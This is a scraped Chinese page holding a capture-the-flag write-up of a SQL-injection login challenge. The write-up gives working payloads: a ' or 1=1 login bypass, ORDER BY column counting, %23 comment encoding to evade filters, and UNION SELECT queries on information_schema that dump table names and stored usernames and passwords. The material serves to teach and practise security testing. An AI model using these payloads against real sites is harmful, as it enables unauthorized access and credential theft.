当前位置: 首页 > news >正文

郑州网站建设哪家公司便宜徐州seo关键词排名

郑州网站建设哪家公司便宜,徐州seo关键词排名,制作网络广告教学设计,做公司+网站建设价格一、题目简介: 二、通关思路: 1、首先查看页面源代码: 我们发现可以使用工具sqlmap来拿到flag,我们先尝试手动注入。 2、 打开靶机,映入眼帘的是登录界面,首先尝试万能密码能否破解。 username: 1 or 11…

一、题目简介

二、通关思路

1、首先查看页面源代码:

我们发现可以使用工具sqlmap来拿到flag,我们先尝试手动注入。

2、 打开靶机,映入眼帘的是登录界面,首先尝试万能密码能否破解。

username: 1' or 1=1 #
password: 随便写任意值

提交submit,发现可以登录:

 并在 Your password 处发现一段乱码,疑似为flag,提交发现错误,这并不是flag,说明flag在别处。

3、通过万能密码已知,注入类型为 字符型,闭合方式为 单引号闭合,尝试查看字段数量。

当 order by 3 时,页面显示如图:

当 order by 4 时,页面显示如图:

Unknown column 4,说明页面报错了,说明字段数为3。

注:这里#使用URL编码格式:% + 十六进制数,目的是防止被过滤,在本题目中若使用 # 或 --+是无法检测出字段数量的,所以在以后的sql注入题目中,最好使用%23。

4、查看回显:

1' union select 1,2,3 %23

 

5、发现回显位 ,开始注出数据库库名,表名,列明,最终拿到flag。

注出库名:
1' union select 1,2,database() %23

 

注出表名:
1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database()) %23

 

注出列名:
1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='l0ve1ysq1') %23

 

 

拿到flag:
1' union select 1,2,(select group_concat(id,username,password) from l0ve1ysq1) %23

 

成功拿到flag,通关。

http://www.yayakq.cn/news/67876/

相关文章:

  • 建网站需要软件公司网站备案需要哪些
  • 怎样建设一个游戏网站wordpress腾讯云cos
  • 成都网站设计制作公司有了自己的网站怎样做后台
  • 深圳网站建设 设计首选cms影视系统
  • 柯桥网站建设手机qq钓鱼网站怎么做
  • 南京网站设计 联络南京乐识网站运营培训机构
  • 做网站有了空间在备案吗软件开发入门
  • 红酒集团网站建设建设银行注册网站
  • 网站二维码制作wordpress首页缩略图不显示
  • 做电子相册的网站模板建设网站
  • 网站后台密码怎么修改架设一个网站需要多少钱
  • 安徽城乡建设部网站首页企业信用信息公示系统湖北
  • 比较有名的公司网站英文网站域名注册
  • 大型网站建设企业白银区住房和城乡建设局网站
  • 最好的微网站建设公司推荐广州外贸网络推广
  • 宝坻集团网站建设专业门户网站开发
  • 网站建设代码标签大全一流的盐城网站建设
  • 400电话 网站建设经典软文案例100例
  • 深圳英文网站建设公司WordPress太臃肿了
  • 怎样评价一个网站做的好与不好制作网页动态效果
  • 在线学习网站建设响应式布局怎么实现
  • .net做的学校网站网站建设维护合同范本
  • 公众号做微网站公司部门设置
  • 在线网站建设联系人天津注册公司多少钱
  • 网站seo外包价格网站必须做ssl认证
  • 设计模板免费网站网络推广员是什么
  • ps做图下载网站有哪些品牌高端网站建设公司
  • 获得网站所有关键字网站内部的信息安全建设
  • 平谷营销型网站建设专业的网站建设科技公司
  • 自适应网站是什么手机在线图片编辑器